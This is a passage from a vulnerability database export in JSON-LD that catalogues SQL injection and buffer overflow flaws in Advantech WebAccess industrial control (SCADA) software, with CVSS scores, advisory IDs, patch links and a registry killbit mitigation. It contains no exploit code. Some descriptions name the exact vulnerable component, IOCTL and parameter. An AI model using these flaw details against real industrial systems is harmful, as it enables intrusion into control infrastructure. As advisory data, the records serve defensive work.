"exploitabilityScore": 8.0, "id": "VHN-54515", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-1234", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2012-1234", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2012-9018", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201202-421", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "7d787100-463f-11e9-b84d-000c29342cb1", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "1a20d46e-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-54515", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "7d787100-463f-11e9-b84d-000c29342cb1" }, { "db": "IVD", "id": "1a20d46e-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9018" }, { "db": "VULHUB", "id": "VHN-54515" }, { "db": "JVNDB", "id": "JVNDB-2012-001563" }, { "db": "CNNVD", "id": "CNNVD-201202-421" }, { "db": "NVD", "id": "CVE-2012-1234" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SQL injection vulnerability in Advantech/BroadWin WebAccess 7.0 allows remote authenticated users to execute arbitrary SQL commands via a malformed URL. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0234. BroadWin SCADA WebAccess is a web browser-based HMI and SCADA software for industrial control systems and automation", "sources": [ { "db": "NVD", "id": "CVE-2012-1234" }, { "db": "JVNDB", "id": "JVNDB-2012-001563" }, { "db": "CNVD", "id": "CNVD-2012-9018" }, { "db": "IVD", "id": "7d787100-463f-11e9-b84d-000c29342cb1" }, { "db": "IVD", "id": "1a20d46e-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-54515" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-1234", "trust": 3.5 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 1.7 }, { "db": "CNNVD", "id": "CNNVD-201202-421", "trust": 1.1 }, { "db": "CNVD", "id": "CNVD-2012-9018", "trust": 1.0 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001563", "trust": 0.8 }, { "db": "IVD", "id": "7D787100-463F-11E9-B84D-000C29342CB1", "trust": 0.2 }, { "db": "IVD", "id": "1A20D46E-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-54515", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "7d787100-463f-11e9-b84d-000c29342cb1" }, { "db": "IVD", "id": "1a20d46e-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9018" }, { "db": "VULHUB", "id": "VHN-54515" }, { "db": "JVNDB", "id": "JVNDB-2012-001563" }, { "db": "CNNVD", "id": "CNNVD-201202-421" }, { "db": "NVD", "id": "CVE-2012-1234" } ] }, "id": "VAR-201202-0342", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "7d787100-463f-11e9-b84d-000c29342cb1" }, { "db": "IVD", "id": "1a20d46e-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9018" }, { "db": "VULHUB", "id": "VHN-54515" } ], "trust": 1.81735348 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "7d787100-463f-11e9-b84d-000c29342cb1" }, { "db": "IVD", "id": "1a20d46e-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9018" } ] }, "last_update_date": "2024-11-23T21:46:31.284000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Advantech/BroadWin WebAccess SQL Injection Vulnerability Patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/34073" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-9018" }, { "db": "JVNDB", "id": "JVNDB-2012-001563" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-89", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-54515" }, { "db": "JVNDB", "id": "JVNDB-2012-001563" }, { "db": "NVD", "id": "CVE-2012-1234" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1234" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1234" }, { "trust": 0.6, "url": "http://web.nvd.nist.gov/view/vuln/search-results?query=cve-2012-1234" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-9018" }, { "db": "VULHUB", "id": "VHN-54515" }, { "db": "JVNDB", "id": "JVNDB-2012-001563" }, { "db": "CNNVD", "id": "CNNVD-201202-421" }, { "db": "NVD", "id": "CVE-2012-1234" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "7d787100-463f-11e9-b84d-000c29342cb1" }, { "db": "IVD", "id": "1a20d46e-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9018" }, { "db": "VULHUB", "id": "VHN-54515" }, { "db": "JVNDB", "id": "JVNDB-2012-001563" }, { "db": "CNNVD", "id": "CNNVD-201202-421" }, { "db": "NVD", "id": "CVE-2012-1234" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-22T00:00:00", "db": "IVD", "id": "7d787100-463f-11e9-b84d-000c29342cb1" }, { "date": "2012-02-22T00:00:00", "db": "IVD", "id": "1a20d46e-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-22T00:00:00", "db": "CNVD", "id": "CNVD-2012-9018" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-54515" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001563" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-421" }, { "date": "2012-02-21T13:31:57.297000", "db": "NVD", "id": "CVE-2012-1234" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-22T00:00:00", "db": "CNVD", "id": "CNVD-2012-9018" }, { "date": "2012-02-23T00:00:00", "db": "VULHUB", "id": "VHN-54515" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001563" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-421" }, { "date": "2024-11-21T01:36:42.830000", "db": "NVD", "id": "CVE-2012-1234" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-421" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess SQL Injection Vulnerability", "sources": [ { "db": "CNVD", "id": "CNVD-2012-9018" }, { "db": "CNNVD", "id": "CNNVD-201202-421" } ], "trust": 1.2 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SQL injection", "sources": [ { "db": "IVD", "id": "7d787100-463f-11e9-b84d-000c29342cb1" }, { "db": "IVD", "id": "1a20d46e-2354-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201202-421" } ], "trust": 1.0 } }
var-201708-1717
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within VideoDAQ.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-546" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-546" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-546", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-546", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-546" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within VideoDAQ.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-546" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4096", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-546", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-546" } ] }, "id": "VAR-201708-1717", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:01:04.679000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\C74A30E2-09B4-443B-B661-AD4F23781674If the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-546" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-546" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-546", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-546", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-546", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess VideoDAQ SDFileEnum Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-546" } ], "trust": 0.7 } }
var-201601-0025
Vulnerability from variot
Buffer overflow in the BwpAlarm subsystem in Advantech WebAccess before 8.1 allows remote attackers to cause a denial of service via a crafted RPC request. This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x11173 IOCTL in the BwpAlarm subsystem. A globals overflow vulnerability exists in a call to strcpy using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A cross-site request forgery vulnerability 11. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0025", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 1.4, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64d0ec90-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-074" }, { "db": "ZDI", "id": "ZDI-16-058" }, { "db": "CNVD", "id": "CNVD-2016-00389" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001290" }, { "db": "CNNVD", "id": "CNNVD-201601-333" }, { "db": "NVD", "id": "CVE-2016-0860" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001290" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-074" }, { "db": "ZDI", "id": "ZDI-16-058" } ], "trust": 1.4 }, "cve": "CVE-2016-0860", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2016-0860", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2016-0860", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 1.4, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2016-00389", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "64d0ec90-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-88370", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2016-0860", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2016-0860", "trust": 1.4, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2016-0860", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2016-0860", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2016-00389", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201601-333", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "64d0ec90-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-88370", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "64d0ec90-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-074" }, { "db": "ZDI", "id": "ZDI-16-058" }, { "db": "CNVD", "id": "CNVD-2016-00389" }, { "db": "VULHUB", "id": "VHN-88370" }, { "db": "JVNDB", "id": "JVNDB-2016-001290" }, { "db": "CNNVD", "id": "CNNVD-201601-333" }, { "db": "NVD", "id": "CVE-2016-0860" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow in the BwpAlarm subsystem in Advantech WebAccess before 8.1 allows remote attackers to cause a denial of service via a crafted RPC request. This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x11173 IOCTL in the BwpAlarm subsystem. A globals overflow vulnerability exists in a call to strcpy using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A cross-site request forgery vulnerability\n11. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2016-0860" }, { "db": "JVNDB", "id": "JVNDB-2016-001290" }, { "db": "ZDI", "id": "ZDI-16-074" }, { "db": "ZDI", "id": "ZDI-16-058" }, { "db": "CNVD", "id": "CNVD-2016-00389" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64d0ec90-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-88370" } ], "trust": 3.96 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-0860", "trust": 5.0 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 2.8 }, { "db": "ZDI", "id": "ZDI-16-074", "trust": 1.8 }, { "db": "ZDI", "id": "ZDI-16-058", "trust": 1.8 }, { "db": "CNNVD", "id": "CNNVD-201601-333", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00389", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-001290", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3227", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3243", "trust": 0.7 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64D0EC90-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-88370", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64d0ec90-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-074" }, { "db": "ZDI", "id": "ZDI-16-058" }, { "db": "CNVD", "id": "CNVD-2016-00389" }, { "db": "VULHUB", "id": "VHN-88370" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001290" }, { "db": "CNNVD", "id": "CNNVD-201601-333" }, { "db": "NVD", "id": "CVE-2016-0860" } ] }, "id": "VAR-201601-0025", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "64d0ec90-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00389" }, { "db": "VULHUB", "id": "VHN-88370" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64d0ec90-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00389" } ] }, "last_update_date": "2024-11-23T21:43:22.893000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 1.4, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2016-00389)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70313" }, { "title": "Advantech WebAccess BwpAlarm Subsystem buffer overflow vulnerability fixes", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59651" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-074" }, { "db": "ZDI", "id": "ZDI-16-058" }, { "db": "CNVD", "id": "CNVD-2016-00389" }, { "db": "JVNDB", "id": "JVNDB-2016-001290" }, { "db": "CNNVD", "id": "CNNVD-201601-333" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88370" }, { "db": "JVNDB", "id": "JVNDB-2016-001290" }, { "db": "NVD", "id": "CVE-2016-0860" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, 